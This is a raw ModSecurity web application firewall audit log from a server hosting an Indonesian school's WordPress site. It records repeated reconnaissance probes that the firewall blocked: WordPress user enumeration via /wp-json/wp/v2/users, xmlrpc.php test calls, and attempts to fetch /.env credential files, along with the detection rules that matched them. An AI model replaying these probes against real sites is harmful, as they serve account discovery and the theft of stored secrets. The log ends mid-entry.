smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89985f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89985f65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923123755880 2811 (- - -) Stopwatch2: 1746923123755880 2811; combined=1137, p1=394, p2=714, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89985f65-Z-- --3d8bd619-A-- [11/May/2025:07:25:30 +0700] aB_uek8xOExV7lPH_Dm6HAAAANY 103.236.140.4 38272 103.236.140.4 8181 --3d8bd619-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d8bd619-C-- demo.sayHello --3d8bd619-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d8bd619-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923130329437 8183 (- - -) Stopwatch2: 1746923130329437 8183; combined=5972, p1=734, p2=4607, p3=134, p4=226, p5=151, sr=72, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8bd619-Z-- --8a3f5379-A-- [11/May/2025:07:26:24 +0700] aB_usObs1CLLACKj-_wFcQAAAI4 103.236.140.4 39778 103.236.140.4 8181 --8a3f5379-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a3f5379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a3f5379-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923184243436 3629 (- - -) Stopwatch2: 1746923184243436 3629; combined=2068, p1=615, p2=1418, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a3f5379-Z-- --f28f7640-A-- [11/May/2025:07:26:32 +0700] aB_uuApy530QiWmSS61_iwAAAFI 103.236.140.4 40014 103.236.140.4 8181 --f28f7640-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f28f7640-C-- demo.sayHello --f28f7640-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f28f7640-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923192706700 6506 (- - -) Stopwatch2: 1746923192706700 6506; combined=4843, p1=605, p2=3994, p3=32, p4=35, p5=105, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f28f7640-Z-- --a3f0f02e-A-- [11/May/2025:07:27:56 +0700] aB_vDObs1CLLACKj-_wF4QAAAIk 103.236.140.4 42348 103.236.140.4 8181 --a3f0f02e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3f0f02e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f0f02e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923276950886 2778 (- - -) Stopwatch2: 1746923276950886 2778; combined=1229, p1=469, p2=730, p3=0, p4=0, p5=30, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f0f02e-Z-- --7b32b935-A-- [11/May/2025:07:28:06 +0700] aB_vFkEuxCpmyy5aJPnB6QAAABM 103.236.140.4 42612 103.236.140.4 8181 --7b32b935-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7b32b935-C-- demo.sayHello --7b32b935-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b32b935-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923286083860 5620 (- - -) Stopwatch2: 1746923286083860 5620; combined=4181, p1=548, p2=3398, p3=31, p4=35, p5=98, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b32b935-Z-- --c5de9068-A-- [11/May/2025:07:28:10 +0700] aB_vGubs1CLLACKj-_wF6wAAAJQ 103.236.140.4 42744 103.236.140.4 8181 --c5de9068-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c5de9068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5de9068-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923290522692 1980 (- - -) Stopwatch2: 1746923290522692 1980; combined=953, p1=321, p2=605, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5de9068-Z-- --c7577b11-A-- [11/May/2025:07:28:19 +0700] aB_vI0EuxCpmyy5aJPnCAAAAAAU 103.236.140.4 43024 103.236.140.4 8181 --c7577b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7577b11-C-- demo.sayHello --c7577b11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7577b11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923299575376 5253 (- - -) Stopwatch2: 1746923299575376 5253; combined=3814, p1=493, p2=3112, p3=31, p4=33, p5=86, sr=66, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7577b11-Z-- --9e842739-A-- [11/May/2025:07:29:06 +0700] aB_vUkEuxCpmyy5aJPnCZAAAAAM 103.236.140.4 44496 103.236.140.4 8181 --9e842739-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e842739-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e842739-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923346688910 2944 (- - -) Stopwatch2: 1746923346688910 2944; combined=1317, p1=470, p2=819, p3=0, p4=0, p5=28, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e842739-Z-- --0ac2c456-A-- [11/May/2025:07:29:14 +0700] aB_vWubs1CLLACKj-_wGMwAAAIo 103.236.140.4 44716 103.236.140.4 8181 --0ac2c456-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0ac2c456-C-- demo.sayHello --0ac2c456-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ac2c456-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923354384810 5796 (- - -) Stopwatch2: 1746923354384810 5796; combined=4548, p1=559, p2=3640, p3=35, p4=35, p5=153, sr=72, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ac2c456-Z-- --f3cb1444-A-- [11/May/2025:07:30:16 +0700] aB_vmApy530QiWmSS62BVAAAAFY 103.236.140.4 46354 103.236.140.4 8181 --f3cb1444-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3cb1444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cb1444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923416144734 2714 (- - -) Stopwatch2: 1746923416144734 2714; combined=1493, p1=478, p2=982, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cb1444-Z-- --960de87c-A-- [11/May/2025:07:30:21 +0700] aB_vnQpy530QiWmSS62BYQAAAFY 103.236.140.4 46494 103.236.140.4 8181 --960de87c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.249 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --960de87c-C-- demo.sayHello --960de87c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --960de87c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923421784109 5914 (- - -) Stopwatch2: 1746923421784109 5914; combined=4769, p1=607, p2=3925, p3=38, p4=45, p5=92, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --960de87c-Z-- --3457a07c-A-- [11/May/2025:07:30:45 +0700] aB_vtebs1CLLACKj-_wGqgAAAJc 103.236.140.4 47094 103.236.140.4 8181 --3457a07c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3457a07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3457a07c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923445389008 2713 (- - -) Stopwatch2: 1746923445389008 2713; combined=1304, p1=472, p2=798, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3457a07c-Z-- --585f4313-A-- [11/May/2025:07:30:52 +0700] aB_vvObs1CLLACKj-_wGsAAAAJU 103.236.140.4 47222 103.236.140.4 8181 --585f4313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --585f4313-C-- demo.sayHello --585f4313-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --585f4313-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923452865874 5931 (- - -) Stopwatch2: 1746923452865874 5931; combined=4411, p1=572, p2=3553, p3=31, p4=94, p5=96, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --585f4313-Z-- --99b7bc75-A-- [11/May/2025:07:47:00 +0700] aB_zhApy530QiWmSS62IuQAAAEI 103.236.140.4 50500 103.236.140.4 8181 --99b7bc75-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 128.199.182.55 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --99b7bc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b7bc75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746924420700089 888 (- - -) Stopwatch2: 1746924420700089 888; combined=407, p1=371, p2=0, p3=0, p4=0, p5=36, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b7bc75-Z-- --24f68d32-A-- [11/May/2025:08:13:56 +0700] aB_51E8xOExV7lPH_DnTvQAAANE 103.236.140.4 43772 103.236.140.4 8181 --24f68d32-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 134.122.28.88 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --24f68d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24f68d32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746926036229768 751 (- - -) Stopwatch2: 1746926036229768 751; combined=305, p1=253, p2=0, p3=0, p4=0, p5=52, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24f68d32-Z-- --e5e2980e-A-- [11/May/2025:11:50:06 +0700] aCAsfgpy530QiWmSS60dAAAAAEM 103.236.140.4 55920 103.236.140.4 8181 --e5e2980e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.85.22 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.85.22 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e5e2980e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5e2980e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746939006340521 805 (- - -) Stopwatch2: 1746939006340521 805; combined=363, p1=322, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5e2980e-Z-- --69a1a547-A-- [11/May/2025:12:55:38 +0700] aCA72ubs1CLLACKj-_y-zQAAAJU 103.236.140.4 57546 103.236.140.4 8181 --69a1a547-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-N910S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --69a1a547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69a1a547-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746942938964632 876 (- - -) Stopwatch2: 